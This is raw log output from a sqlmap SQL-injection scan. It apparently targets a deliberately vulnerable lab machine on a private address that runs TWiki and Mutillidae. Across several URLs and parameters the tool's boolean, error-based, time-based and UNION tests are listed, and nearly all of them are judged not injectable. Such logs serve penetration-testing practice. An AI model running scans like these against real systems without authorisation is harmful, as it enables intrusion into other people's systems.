[18:20:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:20:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:20:52] [INFO] testing 'MySQL inline queries' | |
[18:20:53] [INFO] testing 'PostgreSQL inline queries' | |
[18:20:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:20:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:20:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:20:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:20:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:20:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:20:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:20:57] [INFO] testing 'Oracle AND time-based blind' | |
[18:20:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:21:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:21:11] [WARNING] GET parameter 'rev2' is not injectable | |
[18:21:11] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 13: | |
GET http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.20 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:21:11] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.20' | |
[18:21:11] [INFO] testing connection to the target URL | |
[18:21:12] [INFO] testing if the target URL is stable | |
[18:21:12] [INFO] target URL is stable | |
[18:21:12] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:21:12] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:21:13] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:21:13] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:21:13] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:21:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:21:13] [WARNING] reflective value(s) found and filtering out | |
[18:21:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:21:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:21:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:21:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:21:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:21:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:21:17] [INFO] testing 'MySQL inline queries' | |
[18:21:17] [INFO] testing 'PostgreSQL inline queries' | |
[18:21:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:21:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:21:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:21:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:21:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:21:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:21:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:21:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:21:21] [INFO] testing 'Oracle AND time-based blind' | |
[18:21:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:21:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:21:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:21:38] [WARNING] GET parameter 'rev' is not injectable | |
[18:21:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:21:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.20&rev2=1.19' | |
[18:21:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.19' | |
URL 14: | |
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.21¶m2=1.21 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:21:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.21¶m2=1.21' | |
[18:21:38] [INFO] testing connection to the target URL | |
[18:21:38] [INFO] testing if the target URL is stable | |
[18:21:39] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:21:39] [INFO] testing if GET parameter 'template' is dynamic | |
[18:21:39] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:21:39] [INFO] GET parameter 'template' is dynamic | |
[18:21:39] [INFO] heuristics detected web page charset 'ascii' | |
[18:21:39] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:21:39] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:21:39] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:21:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:21:39] [WARNING] reflective value(s) found and filtering out | |
[18:21:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:21:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:21:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:21:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:21:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:21:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:21:42] [INFO] testing 'MySQL inline queries' | |
[18:21:43] [INFO] testing 'PostgreSQL inline queries' | |
[18:21:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:21:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:21:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:21:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:21:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:21:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:21:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:21:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:21:46] [INFO] testing 'Oracle AND time-based blind' | |
[18:21:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:21:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:21:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:21:58] [WARNING] GET parameter 'template' is not injectable | |
[18:21:58] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:21:58] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:21:58] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:21:58] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:21:58] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:21:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:22:00] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:22:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:22:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:22:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:22:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:22:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:22:03] [INFO] testing 'MySQL inline queries' | |
[18:22:03] [INFO] testing 'PostgreSQL inline queries' | |
[18:22:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:22:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:22:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:22:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:22:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:22:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:22:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:22:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:22:07] [INFO] testing 'Oracle AND time-based blind' | |
[18:22:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:22:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:22:24] [WARNING] GET parameter 'param1' is not injectable | |
[18:22:24] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:22:24] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:22:24] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:22:24] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:22:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:22:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:22:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:22:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:22:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:22:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:22:29] [INFO] testing 'MySQL inline queries' | |
[18:22:29] [INFO] testing 'PostgreSQL inline queries' | |
[18:22:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:22:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:22:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:22:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:22:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:22:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:22:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:22:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:22:33] [INFO] testing 'Oracle AND time-based blind' | |
[18:22:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:22:35] [INFO] target URL appears to be UNION injectable with 1 columns | |
[18:22:35] [WARNING] applying generic concatenation with double pipes ('||') | |
[18:22:36] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') | |
[18:22:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:22:51] [WARNING] GET parameter 'param2' is not injectable | |
[18:22:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/dav/?C=N;O=A' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/dav/?C=S;O=D' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=notes.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=notes.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=text-file-viewer.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=text-file-viewer.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=user-poll.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=user-poll.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=set-background-color.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=set-background-color.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=source-viewer.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=source-viewer.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=framing.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=framing.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/dav/?C=D;O=D' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=register.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=register.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=view-someones-blog.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=view-someones-blog.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=captured-data.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=captured-data.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=installation.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=installation.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=html5-storage.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=html5-storage.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=dns-lookup.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=dns-lookup.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=show-log.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=show-log.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=login.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=user-info.php' | |
[18:22:51] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=credits.php' | |
URL 15: | |
GET http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.irongeek.com/ | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:22:51] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.irongeek.com/' | |
[18:22:51] [INFO] testing connection to the target URL | |
[18:22:51] [INFO] testing if the target URL is stable | |
[18:22:52] [INFO] target URL is stable | |
[18:22:52] [INFO] skipping previously processed GET parameter 'page' | |
[18:22:52] [INFO] testing if GET parameter 'forwardurl' is dynamic | |
[18:22:52] [INFO] confirming that GET parameter 'forwardurl' is dynamic | |
[18:22:52] [INFO] GET parameter 'forwardurl' is dynamic | |
[18:22:52] [WARNING] heuristic (basic) test shows that GET parameter 'forwardurl' might not be injectable | |
[18:22:52] [INFO] heuristic (XSS) test shows that GET parameter 'forwardurl' might be vulnerable to XSS attacks | |
[18:22:52] [INFO] testing for SQL injection on GET parameter 'forwardurl' | |
[18:22:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:22:53] [WARNING] reflective value(s) found and filtering out | |
[18:22:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:22:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:22:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:22:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:22:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:22:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:22:56] [INFO] testing 'MySQL inline queries' | |
[18:22:56] [INFO] testing 'PostgreSQL inline queries' | |
[18:22:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:22:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:22:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:22:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:22:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:22:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:22:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:22:59] [INFO] testing 'Oracle AND time-based blind' | |
[18:23:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:23:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:23:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:23:12] [WARNING] GET parameter 'forwardurl' is not injectable | |
[18:23:12] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.owasp.org' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.issa-kentuckiana.org/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.owasp.org/index.php/Louisville' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.pocodoy.com/blog/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.room362.com/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.isd-podcast.com/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://pauldotcom.com/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.php.net/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=redirectandlog.php&forwardurl=https://addons.mozilla.org/en-US/firefox/collections/jdruin/pr/' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=change-log.htm' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/dav/?C=M;O=D' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=register.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=pen-test-tool-lookup.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=usage-instructions.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=documentation/vulnerabilities.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=password-generator.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=secret-administrative-pages.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=capture-data.php' | |
[18:23:12] [INFO] skipping 'http://192.168.1.113/twiki/bin/edit/Main/WebHome?t=1441456580' | |
URL 16: | |
GET http://192.168.1.113/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:23:12] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:23:12] [INFO] testing connection to the target URL | |
[18:23:12] [INFO] testing if the target URL is stable | |
[18:23:13] [INFO] target URL is stable | |
[18:23:13] [INFO] skipping previously processed URI parameter '#1*' | |
[18:23:13] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/Main/WebHome?skin=print' | |
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/rdiff/Main/WebHome?rev1=1.21&rev2=1.20' | |
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/Main/WebHome?rev=1.20' | |
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/rdiff/Main/WebHome?rev1=1.20&rev2=1.19' | |
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/view/Main/WebHome?rev=1.19' | |
[18:23:13] [INFO] skipping 'http://192.168.1.113/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.21¶m2=1.21' | |
URL 17: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiSite?t=1441456597 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:23:13] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiSite?t=1441456597' | |
[18:23:13] [INFO] testing connection to the target URL | |
[18:23:13] [INFO] testing if the target URL is stable | |
[18:23:14] [INFO] target URL is stable | |
[18:23:14] [INFO] testing if GET parameter 't' is dynamic | |
[18:23:14] [WARNING] GET parameter 't' does not appear dynamic | |
[18:23:14] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:23:14] [INFO] testing for SQL injection on GET parameter 't' | |
[18:23:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:23:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:23:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:23:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:23:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:23:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:23:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:23:18] [INFO] testing 'MySQL inline queries' | |
[18:23:18] [INFO] testing 'PostgreSQL inline queries' | |
[18:23:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:23:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:23:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:23:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:23:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:23:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:23:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:23:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:23:22] [INFO] testing 'Oracle AND time-based blind' | |
[18:23:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:23:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:23:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:23:38] [WARNING] GET parameter 't' is not injectable | |
[18:23:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 18: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Site[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:23:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Site[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:23:38] [INFO] testing connection to the target URL | |
[18:23:38] [INFO] testing if the target URL is stable | |
[18:23:39] [INFO] target URL is stable | |
[18:23:39] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:23:39] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:23:39] [INFO] URI parameter '#1*' is dynamic | |
[18:23:39] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:23:39] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:23:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:23:39] [WARNING] reflective value(s) found and filtering out | |
[18:23:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:23:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:23:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:23:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:23:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:23:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:23:44] [INFO] testing 'MySQL inline queries' | |
[18:23:44] [INFO] testing 'PostgreSQL inline queries' | |
[18:23:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:23:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:23:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:23:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:23:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:23:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:23:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:23:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:23:49] [INFO] testing 'Oracle AND time-based blind' | |
[18:23:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
